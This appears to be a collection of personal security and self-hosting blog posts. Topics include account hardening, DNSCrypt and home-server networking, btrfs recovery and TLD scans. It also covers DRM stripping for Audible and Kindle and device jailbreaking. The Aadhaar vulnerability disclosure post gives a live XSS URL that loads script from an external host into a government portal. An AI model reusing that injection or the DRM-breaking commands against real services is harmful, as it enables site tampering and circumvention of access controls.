Reset password via migadu admin panel.

Ensuring that either of these workflows do not rely on the same email account I’ve just lost access to is vital. Another alternative is to use a trusted-friend (ideally someone more paranoid than me) as a proxy for these emails, and use their domain for managing these 2 services. Might get around to it someday.

My GMail recovery email is set to my main account, so it creates a circular dependency, but one that I actually want.

Bitwarden for password management.
2xHyperFIDO Mini U2F Keys configured for second factor against as many accounts as possible. U2F is not only safer, but much more convenient than TOTP/SMS based 2FA. For iPhone/USB-C users, see the Yubico website. If you don’t like to pay the USB-C tax, there are cheap USB-C to miniUSB adapters that can work with the HyperFIDO key and fit on your keychain. If you aren’t convinced on why this is a good idea, see this guide. The second key is just a backup key, and could be the primary key used by your spouse, friends or co-workers.
A PIN configured on all your SIMs. Instructions for iPhone, Android.
Full-Disk-Encryption on all your devices. Instructions for Windows, Mac, ArchLinux, Fedora, Ubuntu.
Use randomly generated passwords everywhere. Trust your password manager on this.
Setup a PIN on your WhatsApp.
If you own a lot of cryptocurrency, use a hardware wallet and put it in a bank safe. Have a backup one, in another safe. You can put the PIN for those in your password store. I haven’t researched enough to suggest you which wallet(s).
Get a SIM without an Aadhaar, to make SIM-Jacking attackes harder (applies in India).
Go through securityplanner.org, which gives you personalized recommendations customized for our risk profile. I agree with most of their recommendations⁸
Signup for breach notifications against your email at https://haveibeenpwned.com/.
If you’d like to get off GMail, pay for FastMail. Alternatively, if I know you in real-life, I’m happy to host your mail in my Migadu account. (Only works if you know me well enough to trust me)

Why are you so paranoid?

I work in infosec. Breaking things comes naturally to me, and I plan for defense-in-depth. Plus, I’d be a terrible security person if I got hacked.

Availability is a pain point, especially if you aren’t in the US. Even getting my hands on a SoloKey was hard, despite backing it on KickStarter.

OnlyKey also makes some claims regarding open source, but I can’t find their schematics anywhere.
SoloKey is great, and what I’d recommend, but it doesn’t support OpenPGP yet.
[NitroKey Start][nitrokey-start] is apparently completely FOSS, so you might wanna check that.

The HyperFIDO keys are compliant to the U2F/FIDO standards, and I’ve not faced any issues while using them. They’re cheap and widely available. Unless you need GPG, go for it.

Thanks to Giridharan, Santosh, and Akshay for reviewing drafts of this and offering valuable suggesions. If you have any suggestions, happy to hear them

[passforios]: https://mssun.github.io/passforios/ “Open Source, no-network, minimalist pass client for iOS” [okc]: https://www.openkeychain.org/ [pass]: https://passwordstore.org [tile]: https://www.thetileapp.com/en-us/ [slim]: https://www.thetileapp.com/en-us/store/tiles/slim “I have the older version of the Tile Slim” [ssh-u2f]: https://www.undeadly.org/cgi?action=article;sid=20191115064850 “Does it really count as 2FA if both your SSH and U2F is the same device?” [nitrokey-start]: https://shop.nitrokey.com/shop/product/nitrokey-start-6

I moved away from Lastpass after Tavis Ormandy reported a RCE vulnerability on their browser extension. Their wikipedia page mentions 2 breaches, and 3 security incidents. It has never undergone a security audit (unlike bitwarden) and is not something I recommend anymore. ↩
The pass-tomb extension bypasses this limit and encrypts your filenames as well. ↩
I have my own git server configured as a fallback if it goes down. I ensure the same controls on my Git server as Gitea, and it runs in my living room. ↩
I lost my previous GPG key because my Yubikey stopped working ↩
The jury is still out on whether this counts as an “independent second factor”. ↩
The domain is stuck in a legal limbo, because of an ongoing case between my registrar and NIXI (which runs the .in registry). If you have any suggestions/ideas, please reach out. ↩
Namecheap announced U2F support in April 2019, and while it was buggy at first, it has definitely improved. ↩
The one major exception is lastpass, which I no longer recommend. ↩

Downgrading my iPad 2 to iOS 8

2019-08-11T00:00:00+00:00

Update: Apple is no longer signing iOS6 for the iPad 2, so this is no longer feasible.

I own a iPad 2 (GSM), which is rarely used these days because it is too slow with the latest iOS 9 upgrades. It is a 8 year old device, but I can’t just install Linux on it and make it usable, which is what I do with most other devices.

The next best thing was to downgrade the iOS version. The device is anyway un-supported at this point, so I might as well go there. Apple has restrictions on which iOS releases are installable at any point on any device, ~but thankfully they are still signing iOS6 for my device for some legal reasons~.

Steps:

Download the iOS firmware for your device from https://ipsw.me/#platform
Launch iTunes
Option+Click on the Restore button in iTunes
Select the file you just downloaded.
Disable iCloud on the device
Upgrade to iOS8

This is possible as long as Apple is signing the IPSW for your device. The case of iOS6 being signed seems to be true for:

iPhone 4S
iPad 2

Security Notes

Running an unsupported OS is not something I take lightly. Here’s a list of defensive measures I took to ensure that I’m not at risk while doing so:

Try to keep the device always in Airplane mode.
Keep sensitive data off the device. No photos/keychain sync for eg. Don’t enable Calendar/Contact/Media sync.
Enable Restrictions on the device:
- Restrict Safari to limited websites.
- Disable application installs.
- Disable iTunes store/iBooks store etc.
- Disable GPS/Bluetooth.
- Limit Background Refresh to very few trusted applications.
Limit number of applications (I only have Kybooks installed).
Disable Javascript on Safari.

If possible, I’d recommend using a separate Apple Account on the device.

Cleaning up Google Purchases

2019-06-01T00:00:00+00:00

The Google Purchase History feature has been doing rounds in the news recently. In case you missed it, go to https://myaccount.google.com/purchases right now and make sure you are logged in with your personal gmail account to see what all Google thinks you’ve bought.

For me it lists purchases going as far back as 2013, which include:

All of my Amazon Purchases (including Kindle and Audible)
Flipkart/Sneapdeal purchases
Gifts I’ve bought for others on various platforms
All my iCloud purchases
Purchases on Steam
BigBasket purchases
Google Playstore purchases as well, of course
And much, much more.

For each of the purchases, it remembers the price, the taxes, as well as the delivery address used.

While this isn’t shocking in the least, I was surprised, because as a Infosec professional, I’ve disabled all of google’s invasive tracking features:

All my Activity Controls are paused.
Google Location history is disabled for my account.
I have Shared endorsements turned off.
Ad personalization is turned off.
I used to run with the Protect my Choices extension till a while back to avoid targeted advertising.

Regardless, the Google purchases page had hundreds of results, going back half a decade. Google currently does not offer a way to delete collected purchases directly, or to pause this collection in any way. The only way is to find the emails that Google scanned, and delete them.

I ended up deleting everything from the following email addresses:

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]@services.target.com
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

Note that deleting the email doesn’t seem to be sufficient either, you need to clear your Trash, and then wait for a while (almost 2 days for me) before the system refreshes. After 3 days of just deleting mails, I finally got this screen:

Google seems to be picking up all kinds of emails, including:

Invoices
Shipment Confirmations / Updates
Return confirmations
Payment Confirmations
Order Cancellations
Payment Failures (gasp!)

Warning about Deletions

I’ve already switched away from Amazon/Flipkart emails from my Gmail. But deleting invoices from your inbox isn’t always the best idea. Most websites will let you re-download invoices (Amazon/Flipkart do), but take care not to delete any necessary emails that you might need for warranty claims or any other purpose later.

Migrating DNSCrypt Server to Docker

2019-05-18T00:00:00+00:00

I’ve been running a personal DNSCrypt server in Bangalore for the last 2 years. When I set it up, it was just a compiled version of dnscrypt-wrapper, which was the bare minimum setup I could do.

Since then, I’ve upgraded it to a distribution supported version, but recent changes in dnscrypt key rotation, I’ve been wanting to setup something automated as well.

The easiest way was to switch to the official DNSCrypt Docker image, which does both key generation and certificate rotation. Since my public key was already present in the DNSCrypt Server lists, I was not too keen to regenerate a new key.

The primary challenge was ensuring that the docker container picks up my existing keys without trying to generate new ones from scratch. It was basically 2 steps:

Match the directory structure that the container expects.
Invoke the container directly into start mode while passing existing keys.

Directory Structure

I copied my keys (public.key, secret.key) to /etc/dnscrypt-keys and ran the following:

echo 2.dnscrypt-cert.captnemo.in > provider_name
touch provider_info.txt # I couldn't figure out how to output the same info, so kept it blank
hexdump -ve '1/1 "%.2x"' < public.key > public.key.txt

Then I ensured that the file permissions are matching what the container expects:

chmod 640 secret.key
chmod 644 public.key
chown root:1002 public.key secret.key
chmod 644 provider_name

This is how the final permissions looked for the directory (/etc/dnscrypt-keys)

-rw-r-----   1 root 1002    64 May 18 07:15 secret.key
-rw-r--r--   1 root 1002    32 May 18 07:15 public.key
-rw-r--r--   1 root root    28 May 18 07:19 provider_name
-rw-r--r--   1 root root     0 May 18 07:23 provider_info.txt
-rw-r--r--   1 root root    64 May 18 07:25 public.key.txt
drwxr-xr-x   2 root root  4096 May 18 07:26 .

Running the Container

Then, I directly ran dnscrypt-wrapper container:

docker run --detatched --restart=unless-stopped --volume /etc/dnscrypt-keys:/opt/dnscrypt-wrapper/etc/keys --publish 10.47.0.5:4434:443/tcp --publish 10.47.0.5:4434:443/udp jedisct1/dnscrypt-server start

I pass a host path mount instead of creating a Docker Volume, since they can get deleted in regular docker prune.

Here, 10.47.0.5 is the “Anchor IP”, which Digital Ocean internally maps to my Floating IP.

The container comes up, generates new short-term keys and goes live:

Starting DNSCrypt service for provider:
2.dnscrypt-cert.captnemo.in
Starting pre-service scripts in /etc/runit_init.d
setup in directory /opt/unbound/etc/unbound
generating unbound_server.key
Generating RSA private key, 3072 bit long modulus (2 primes)
.......++++
...................++++
e is 65537 (0x010001)
generating unbound_control.key
Generating RSA private key, 3072 bit long modulus (2 primes)
.........................++++
........................................++++
e is 65537 (0x010001)
create unbound_server.pem (self signed certificate)
create unbound_control.pem (signed client certificate)
Signature ok
subject=CN = unbound-control
Getting CA Private Key
Setup success. Certificates created. Enable in unbound.conf file to use
ok: run: unbound: (pid 28) 300s
ok: run: dnscrypt-wrapper: (pid 31) 300s
ok: run: unbound: (pid 28) 600s
ok: run: dnscrypt-wrapper: (pid 31) 600s

Once the server was up, I verified connectivity with dnscrypt-proxy and it worked perfectly.

Future Scope

Right now, I have a single container that does 2 things:

Certificate Rotation via a service that checks it every 30 minutes.
DNSCrypt Service, which is accessible over the internet.

For (1) to work, it needs access to the Private Keys that are used to sign the temporary certificates that last 24 hours. Since both things are managed within the same container, the container ends up with both network and long-term keys access. This means, any RCE on the service can result in the long-term keys being compromised.

A simple fix for this would be to separate out the Certificate Rotation part into a separate “mode” on the Docker Image, which can be called independently. This would allow someone to run certificate rotation on a second container using a scheduler, but with far more limitations (such as no network access). A common file-mount between both the containers can take care of sharing the temporary keys between the containers, and a simple unix socket on the shared-file-mount can be used to signal a certificate rotation (this triggers the dnscrypt service restart, so it picks the new cert).

Stripping Audible DRM

2019-04-14T00:00:00+00:00

Self-Guide for stripping the Audible DRM, in similar vein as my Kindle Self-Guide.

Download the aax file from Audible website.
Run the inAudible-NG Rainbrow crack table against the AAX file.

Easiest way is via docker/podman:

cd ~/Music/Audiobooks
podman run -v $(pwd):/data ryanfb/inaudible@sha256:b66738d235be1007797e3a0a0ead115fa227e81e2ab5b7befb97d43f7712fac5
for i in "*.m4a"; do fix-audible-m4a "$i";done

The cool part about this is that the entire activation is done offline, and runs a Rainbow Table attack against the Audible DRM. To make the process faster in the future, you can save your “activation bytes” (8 hex characters) and directly use them with ffmpeg to decode instead:

ffmpeg -loglevel panic -y -activation_bytes ${AUDIBLE_ACTIVATION_BYTES} -i "$aax_file" -c:a copy -vn "$m4a_file"

A small percentage of Audible AAX files have a incorrect bit set in the “Audio Object Type Specific Config” in the ESDS atom in an M4A file, which leads to them not playing in Firefox/Android and some other players. To fix this, I have a fix-audible-m4a script called above.

References

Kindle Hacks, A Self-guide

2019-03-26T00:00:00+00:00

I run a non-standard Kindle configuration:

Jailbroken (because I want to own the device, not rent it)
Runs KOReader (because I want to read EPUBs and PDFs with reflow.)
DRM Stripping (because I want to own the book, not rent it)

Since I don’t do any of these often enough to automate it, this is a self guide to help me follow these steps the next time I have to do any of this. No guarantees of this being helpful to anyone else but me.

Jailbreak

The lifehacker guide on how to jailbreak your kindle is a good starting point [archived]. The mobileread forums have the definitive guides. Also see this FAQ on the mobileread wiki.

(Most of these only cover modern paperwhite kindles)

Maintaining the Jailbreak

Sometimes, Kindle firmware updates will stop the Jailbreak. Search for your firmware on mobileread forums. See this link for the 5.8 series.

Copy the .bin file to your kindle root directory and trigger a manual firmware update. That should reboot and re-affirm the jailbreak. To trigger a manual firmware update, go to the Kindle Menu and click “Update”. If it is greyed out, check if the file was copied correctly, and try rebooting.

Applications

Once you have a jailbreak, the rest is mostly installing packages via MRPI. I keep a ready directory of packages I can copy as-is to my Kindle. The current listing is at https://paste.ubuntu.com/p/CXS5hYZdqc/ with most of it just being koreader.

koreader is a FOSS document viewer for E Ink devices that supports Kindle, Kobo, PocketBook, Ubuntu Touch and Android devices.

The primary 2 packages are:

Update_KUALBooklet_v2.7_install.bin
update_kpvbooklet_0.6.6_install.bin

Run ;log mrpi via search after copying them to re-install them if needed.

koreader

Download the latest release from GitHub.

You should download the kindle5-linux-gnueabi package for modern Paperwhites. Unzip it to the copy directory mentioned above.

Aside: koreader has a linux appimage version for desktops, which I package for AUR.

DRM is inherently bad for users. If I switch my Ebook reader from Kindle (which are great as of today) to a Kobo tomorrow, I want my content to stay with me.

There are much better websites that explain the issues with DRM, so go visit: fckdrm.com, DefectiveByDesign.org, or EFF/drm.

The primary tool for stripping DRM from Kindle books is apprenticeharper’s DeDRM Repo which works as a Calibre Plugin. If you are running calibre with Python 3 (such as via the calibre-python3 package on Arch Linux) - you should install the DeDRM plugin from the python3 fork. Compress the DeDRM_plugin directory into a flat-zip file and use that in Calibre.

Getting the Key

My current key is saved in pass:

pass show Keys/Kindle.k4i |jq

Save it in a file, which you can import to Calibre.

If you don’t have the key or if the above isn’t valid, see this comment on r/ebooks [archived].

Importing the Key

At the bottom-left of the plugin’s customization dialog, you will see a button labeled “Import Existing Keyfiles”. Use this button to import existing ‘.k4i’ key files. Key files might come from being exported from this plugin, or may have been generated using the kindlekey.pyw script running under Wine on Linux systems.

I once did some trickery on the kindlekey.pyw application to get it working on my system, but I didn’t take notes. If I ever do this again - AUTOMATE THIS.

Getting a copy of the encrypted book

There are multiple sources for you to try.

Amazon website’s My Content page is the easiest. It doesn’t work for books with special typesetting - quite rare. Prefer this over everything else.
Download via the Kindle for PC application (See next section).
Get the KFX file from your Kindle device.
Copy the KFX/AZW file from the Android/iOS application.

Kindle for PC

Stripping DRM for any medium is always a cat-and-mouse game. Amazon keeps changing the DRM format in every Kindle firmware update, which is why the recommended method is to use a known/older version of the Kindle for Mac/PC Application as your source.

Note: The 1.24.3 release does not work on Linux. If you’re on Linux, you must instead download the 1.17.0 release instead (sha256=14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200).

Install Kindle for PC. It does work on Wine. Make sure you download 1.24.3 (51068). I trust filehippo for this. The sha256sum for the installer is c7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7.
Install then launch it, and download the book.
Go to ~/Documents/My Kindle Content
Find book by Last Modified Date.
Run calibredb add book.azw. If all goes well, the book should show up in your library, and you should be able to convert it.

Reference Files

I have a backup of my current Kindle files at http://ge.tt/75zk4Dv2 in case you need any of the files mentioned above. Checksums for the files are below, since ge.tt doesn’t believe in HTTPS:

e3b05193ed9d0b482f01dfb550eba67f3b113b5165aae5632379cf35fec2f59d  copy.tar.gz
14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200  KindleForPC-installer-1.17.44170.exe
c7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7  KindleForPC-installer-1.24.51068.exe
50bb0e5d9c03bcb79b17c1b7063cefd2c947a9d1c4392814e6ec05225296472a  kual-helper-0.5.N.zip
39352b4b68993680f06d5ecc57ce7ec4c271b6b5f2386ea998027420c45f2acd  KUAL-KDK-1.0.azw2
ceb207ee4c8d3674f308ff91432aeabf213b203571e270f70b8ae218df6ded7d  KUAL-KDK-2.0.azw2
fce02f0e104e846f1e4cc0e029500c5a722614d63a47035d78ea4cf59f67a448  kual-mrinstaller-1.6.N.zip
4a6de1fafe47ec0e3bfb529edead401c92e66b00697d507abe945679b3b7bc65  KUAL-v2.7.zip
253d0b00b31d62ef9dadb7ca88b98e2718cb35246816b3c50dd63c0a7ef28a52  Update_jailbreak_hotfix_1.14_5.8.10_install.bin
cc63ba1b454d1f32492c835f108ee04aaa80e6e7a95f12b7216c2c015daa2fbc  Update_jailbreak_hotfix_1.14_nomax_install.bin

Dealing with dead disks in a btrfs RAID1 array

2019-02-24T00:00:00+00:00

tl;dr: Check your disk usage v/s RAID capacity to ensure that you can remove a disk before trying. If you can connect a new disk without removing the old one, run a btrfs replace - it is much faster.

My homeserver setup has a 4 disk setup:

128GB Samsung EVO 850 SSD as the primary disk (root volume)
A 3 Disk btrfs RAID1 Array that I use for almost everything else.

The 3 disks were:

A WD-3.5inch-3TB that I shelled from a WD-MyBook. This was the oldest disk in the array
2xSeagate 2.5-inch-3TB external disks that I shelled from Seagate Expansion disks.

The WD disk had been giving rising errors recently, and I was noticing hangs on the system as well:

My Steam saves would take time, and hang the game.
Kodi would ocassionaly hang just switching between screens as it would load images from disk.
gitea, which writes a lot to disk would get similar issues.

I asked a question on r/archlinux and confirmed that it indeed a dead disk.

Ordered a new Seagate Barracuda 3TB the next day, but my peculiar setup caused me a lot of pain before I could remove the dead disk. The primary issue was with the limited number of SATA connectors I had (just 4). The original setup had /dev/sdb,/dev/sdc,/dev/sdd as the three RAID disks with /dev/sdb being the dying WD.

This is what all I tried:

Removing /dev/sdb and adding a new disk the array (/dev/sde). Unfortunately, to add a disk to the array, you have to mount it first, and the setup just refused to mount in degraded mode. (It didn’t give a visibly error, so I didn’t know why)
I tried to keep the old disk attached over USB on a friend’s suggestion, but that didn’t work either. This was likely a cable issue, and I didn’t investigate this further.
Booting with the original three disks but replacing the dying disk with the new one post boot. Didn’t work as I kept getting read/write errors to sdb even after it was disconnected.

In short:

the system refused to mount the raid array with a missing disk (and I didn’t want to risk a boot with the array unavailable)
I couldn’t do a live replace because I had a limited number of SATA connectors.

What worked:

Running a btrfs device delete and leting it run overnight. It gave an error after quite a long time that finally helped me figure out the problem:

btrfs device delete /dev/sdb1 /mnt/xwing
ERROR: error removing device '/dev/sdb1': No space left on device

btrfs fi df /mnt/xwing
Data, RAID1: total=2.98TiB, used=2.98TiB
System, RAID1: total=32.00MiB, used=544.00KiB
Metadata, RAID1: total=5.49GiB, used=4.81GiB
GlobalReserve, single: total=512.00MiB, used=0.00B

The RAID array was 2.7TBx3 disks and I was storing roughly 2.98TB of data. To switch to a RAID1 setup with just 2 disks, I needed to delete some data. I ended up clearing out a few steam games (bye bye Witcher 3) and ran another btrfs device delete to resolve the issue.

If you are faced with a situation where you have to remove a device, but can’t do a live replace, here’s what you need:

Check that your disk removal does not impact any data storage. Your n-1 disk array should have enough capacity to store everything.
Run a btrfs device delete
Reboot
Re-attach new disk, and then run a btrfs device add

As a retro, I posted a summary with the issues I faced on the [email protected]/T/#u">btrfs mailing list

If you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:

If you have any comments, reach out to me

Aadhaar Vulnerability Public Disclosure

2018-09-15T00:00:00+00:00

The Vulnerability

The UIDAI Resident Portal (with read access to entire Aadhaar Demographic data) is runing a vulnerable version of LifeRay software. It is running LifeRay 6.1, which was declared End-of-Life in Febrary 2016.

This release includes multiple known vulnerabilities, including:

A XSS issue, for which a PoC can be found at resident.uidai.gov.in (Picture Credits: @sanitarypanels)
Multiple RCEs: See issue-62 for eg.

In fact the release is so old it does not even appear on the “Known Vulnerabilities” page on the LifeRay website; you have to go look at their Archived Vulnerabilities.

The PoC

You can find a simple Proof of Concept for the XSS issue at resident.uidai.gov.in.

The cdn_host parameter injects javascript from $CDN_HOST/Resident-theme/js/custom.js, in this case https://scan.bb8.fun/Resident-theme/js/custom.js which hosts a small snippet to overwrite the HTML of the page.

It shows up like:

Fun

The current script allows for embeding any tweet using a tweet parameter. To embed:

Go to any tweet, copy the part after twitter.com and pass it as the tweet parameter. For eg, to embed this tweet:

Breaking: Exclusive footage from inside @UIDAI's IT department after media reports of Aadhaar data leaks. pic.twitter.com/W7m9L0HvEX
— Aadhaar Compound Wall (@13footwall) March 29, 2018

Look at the URL: https://twitter.com/13footwall/status/979301578686345216
Copy 13footwall/status/979301578686345216 and pass it as the tweet parameter:
The URL becomeshttps://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&tweet=13footwall/status/979301578686345216
SHARE IT

The Report

I initially reported this to [email protected] in Jan 2017:

Forgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:

Update

There is some confusion regarding which version of LifeRay is UIDAI running. They seem to be running 6.1.1, released in 2013-02-26.

The exact version is not relevant to the fact that UIDAI is:

running an unsupported release
which is 5 year old
not updating it despite being notified multiple times

0800 16-Sep: UIDAI seems to have patched the issue by putting a block on the cdn_host parameter. This still leaves them vulnerable to multiple vulnerabilities until they update to a supported release.

Timeline

The vulnerability is still not fixed. Here is a complete timeline:

Date	What?
16 Jan 2017	Initially reported to `[email protected]`. No response
21 Jan 2018	Reported to `[email protected]` and `[email protected]`. No response
19 Feb 2018	Reminder sent to `[email protected]` and `[email protected]`
19 Feb 2018	Acknowledgement from CERT
15 Mar 2018	Reminder sent. No response
17 Mar 2018	Notified [email protected]">NCIIPC
18 Mar 2018	Confirmation from NCIIPC asking for more details. I replied back with a quote of previous exchange
19 Mar 2018	Confirmation from NCIIPC thanking me for the report.
19 Apr 2018	Reminder sent to UIDAI asking for acknowledgement
30 May 2018	Reminder sent to NCIIPC and CERT asking for updates

The only change that I’m aware of since my initial report is that the website stopped declaring the LifeRay version in a HTTP response Header.

A records on top level domains

2018-08-18T00:00:00+00:00

A few more changes since the last time I ran this.

Update: An automatically updated version of this is available at https://captnemo.in/tld-a-record/

TLD	IP	Web
ai	209.59.119.34	[http] [https]
arab	127.0.53.53	[http] [https]
bh	88.201.27.211	[http] [https]
charity	127.0.53.53	[http] [https]
cm	195.24.205.60	[http] [https]
dk	193.163.102.58	[http] [https]
gg	87.117.196.80	[http] [https]
inc	127.0.53.53	[http] [https]
je	87.117.196.80	[http] [https]
pa	168.77.8.43	[http] [https]
pn	80.68.93.100	[http] [https]
politie	127.0.53.53	[http] [https]
tk	217.119.57.22	[http] [https]
uz	91.212.89.8	[http] [https]
ws	64.70.19.33	[http] [https]
мон	202.170.80.40	[http] [https]
мон	218.100.84.27	[http] [https]
мон	180.149.98.78	[http] [https]
政府	127.0.53.53	[http] [https]
عرب	127.0.53.53	[http] [https]

Diff:

+bh
+charity
-etisalat
+inc
-اتصالات
-招聘
 政府

Google owned TLDs don't have A records any more

2018-06-02T00:00:00+00:00

A little while ago (Jan 2018), I ran a scan to see which all TLDs have an A record set (on the TLD). This is what lets you visit http://ai/ as a valid website on your browser, for eg.

I ran the same scan as http://blog.towo.eu/a-records-on-top-level-domains/ (link is down, archived) and the results are at https://captnemo.in/blog/2018/02/09/tld-a-records/.

Decided to re-run the scan today, and noticed a stark difference: A lot of Google-owned TLD’s which were earlier pointing to 127.0.53.53 don’t have a A record anymore.

Scan run from AS45609.

Results:

TLD	IP	Web
ai	209.59.119.34	[http], [https]
arab	127.0.53.53	Private IP
cm	195.24.205.60	[http], [https]
dk	193.163.102.58	[http], [https]
etisalat	127.0.53.53	Private IP
gg	87.117.196.80	[http], [https]
je	87.117.196.80	[http], [https]
pa	168.77.8.43	[http], [https]
pn	80.68.93.100	[http], [https]
politie	127.0.53.53	Private IP
tk	217.119.57.22	[http], [https]
uz	91.212.89.8	[http], [https]
ws	64.70.19.33	[http], [https]
мон	218.100.84.27	[http], [https]
мон	202.170.80.40	[http], [https]
мон	180.149.98.78	[http], [https]
اتصالات	127.0.53.53	Private IP
政府	127.0.53.53	Private IP
عرب	127.0.53.53	Private IP
招聘	127.0.53.53	Private IP

Comparing with the previous scan, these TLDs no longer have an A record with them:

-android
-cal
-chrome
-dclk
-drive
-gle
-guge
-hangout
-nexus
-play
-sport
-谷歌
-グーグル

The majority of these are owned by Google. Not claiming it means anything, just a nice observation.

Update: An automatically updated version of this is available at https://captnemo.in/tld-a-record/

Home Server Networking

2018-04-22T00:00:00+00:00

Next in the Home Server series, this post documents how I got the networking setup to serve content publicly from my under-the-tv server.

Background

My home server runs on a mix of Docker/Traefik orchestrated via Terraform. The source code is at https://git.captnemo.in/nemo/nebula (self-hosted, dogfooding FTW!) if you wanna take a look.

The ISP is ACT Bangalore¹. They offer decent bandwidth and I’ve been a customer long time.

Public Static IP

In order to host content, you need a stable public IP. Unfortunately, ACT puts all of its customers in Bangalore behind a NAT ². As a result, I decided to get a Floating IP from Digital Ocean ³.

The Static IP is attached to a cheap Digital Ocean Droplet (10$/mo). If you resolve bb8.fun, this is the IP you will get:

Name:   bb8.fun
Address: 139.59.48.222

The droplet has a public static IP of it’s own as well: 139.59.22.234. The reason I picked a Floating IP is because DO gives them for free, and I can switch between instances later without worrying about it.

Floating IP

On the Digital Ocean infrastructure side, this IP is not directly attached to an interface on your droplet. Instead, DO uses something called “Anchor IP”:

Network traffic between a Floating IP and a Droplet flows through an anchor IP, which is an IP address aliased to the Droplet’s public network interface (eth0). You should bind any public services that you want to make highly available through a Floating IP to the anchor IP.

So, now my Droplet has 2 different IPs that I can use:

Droplet Public IP (139.59.22.234), assigned directly to the eth0 interface.
Droplet Anchor IP (10.47.0.5), setup as an alias to the eth0 interface.

This doubles the number of services I can listen to. I could have (for eg) - 2 different webservers on both of these IPs.

OpenVPN

In order to establish NAT-punching connectivity between the Droplet and the Home Server, I run OpenVPN server on the Droplet and openvpn-client on the homeserver.⁴

The Digital Ocean Guide is a great resource if you ever have to do this. 2 specific IPs on the OpenVPN network are marked as static:

Droplet: 10.8.0.1
Home Server: 10.8.0.14

Home Server - Networking

The server has a private static IP assigned to its eth0 interface
It also has a private static IP assiged to its tun0 interface

There are primarily 3 kinds of services that I like to run:

Accessible only from within the home network (Timemachine backups, for eg) (Internal). This I publish on the eth0 interface.
Accessible only from the public internet (Wiki) (Strictly Public). These I publish on the tun0 interface and proxy via the droplet.
Accessible from both places (Emby, AirSonic) (Public). These I pubish on both tun0 and the eth0 interface on the homeserver.

Docker Networking Basics

Docker runs its own internal network for services, and lets you “publish” these services by forwarding traffic from a given interface to them.

In plain docker-cli, this would be:

docker run nginx --publish 443:443,80:80 (forward traffic on 443,80 on all interfaces to the container)

Since I use Terraform, it looks like the following for Traefik:

# Admin Backend
ports {
  internal = 1111
  external = 1111
  ip       = "${var.ips["eth0"]}"
}

ports {
  internal = 1111
  external = 1111
  ip       = "${var.ips["tun0"]}"
}

# Local Web Server
ports {
  internal = 80
  external = 80
  ip       = "${var.ips["eth0"]}"
}

# Local Web Server (HTTPS)
ports {
  internal = 443
  external = 443
  ip       = "${var.ips["eth0"]}"
}

# Proxied via sydney.captnemo.in
ports {
  internal = 443
  external = 443
  ip       = "${var.ips["tun0"]}"
}

ports {
  internal = 80
  external = 80
  ip       = "${var.ips["tun0"]}"
}

There are 3 “services” exposed by Traefik on 3 ports:

Traefik Admin Interface: Useful for debugging. I leave this in Read-Only mode with no authentication. This is an Internal service
HTTP, Port 80: This redirects users to the next entrypoint (HTTPS). This is a Public service.
HTTPS, Port 443: This is where most of the traefik flows. This is a Public service.

For all 3 of the above, Docker forwards traffic from both OpenVPN, as well as the home network. OpenVPN lets me access this from my laptop when I’m not at home, which is helpful for debugging issues. However, to keep the Admin Interface internal, it is not published to the internet.

Internet Access

The “bridge” between the Floating IP and the OpenVPN IP (both on the Digital Ocean droplet) is simpleproxy. It is a barely-maintained 200 line TCP-proxy. I picked it up because of its ease of use as a TCP Proxy. I specifically looked for a TCP Proxy because:

I did not want to terminate SSL on Digital Ocean, since Traefik was already doing LetsEncrypt cert management for me
I also wanted to proxy non-web services (more below).

The simpleproxy configuration consists of a few systemd units:

[Service]
Type=simple
WorkingDirectory=/tmp
# Forward Anchor IP 80 -> Home Server VPN 80
ExecStart=/usr/bin/simpleproxy -L 10.47.0.5:80 -R 10.8.0.14:80
Restart=on-abort

[Install]
WantedBy=multi-user.target

[Unit]
Description=Simple Proxy
After=network.target

I run 3 of these: 2 for HTTP/HTTPS, and another one for SSH.

While I use simpleproxy for its stability and simplicity, you could also use iptables to achieve the same result.

SSH Tunelling

When I’m on the go, there are 3 different SSH services I might need:

Digital Ocean Droplet
Home Server
Git (gitea runs its own internal git server)

My initial plan was:

Forward Port 22 Floating IP Traffic to Gitea.
Use the eth0 interface on the droplet to run the droplet sshd service.
Keep the Home Server SSH forwarded to OpenVPN, so I can access it over the VPN network.

Unfortunately, that didn’t work out well, because sshd doesn’t support listening on an Interface. I could have used the Public Droplet IP, but I didn’t like the idea.

The current setup instead involves:

Running the droplet sshd on a separate port entirely (2222).
The simpleproxy service forwarding port 22 traefik to 2222 on OpenVPN IP which is then published by Docker to the gitea container’s port 22.

The complete traefik configuration is also available if you wanna look at the entrypoints in detail.

Caveats

Traefik Public Access

You might have noticed that because traefik is listening on both eth0 and tun0, there is no guarantee of a “strictly internal” service via Traefik. Traefik just uses the Host headers in the request (or SNI) to determine the container to which it needs to forward the request. I use *.in.bb8.fun for internaly accessible services, and *.bb8.fun for public. But if someone decides to spoof the headers, they can access the Internal service.

Since I’m aware of the risk, I do not publish anything via traefik that I’m not comfortable putting on the internet. Only a couple of services are marked as “internal-also”, and are published on both. Services like Prometheus are not published via Traefik.

2 Servers

Running and managing 2 servers takes a bit more effort, and has more moving parts. But I use the droplet for other tasks as well (running my DNSCrypt Server, for eg).

Original IP Address

Since SimpleProxy does not support the Proxy Protocol, both Traefik and Gitea/SSH servers don’t get informed about the original IP Address. I plan to fix that by switching to HAProxy TCP-mode.

If you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:

If you have any comments, reach out to me

If you get lucky with their customer support, some of the folks I know have a static public IP on their home setup. In my case, they asked me to upgrade to a corporate plan. ↩
I once scanned their entire network using masscan. It was fun: https://medium.com/@captn3m0/i-scanned-all-of-act-bangalore-customers-and-the-results-arent-surprising-fecf9d7fe775 ↩
AWS calls its “permanent” IP addresses “Elastic” and Digital Ocean calls them “Floating”. We really need better names in this industry. ↩
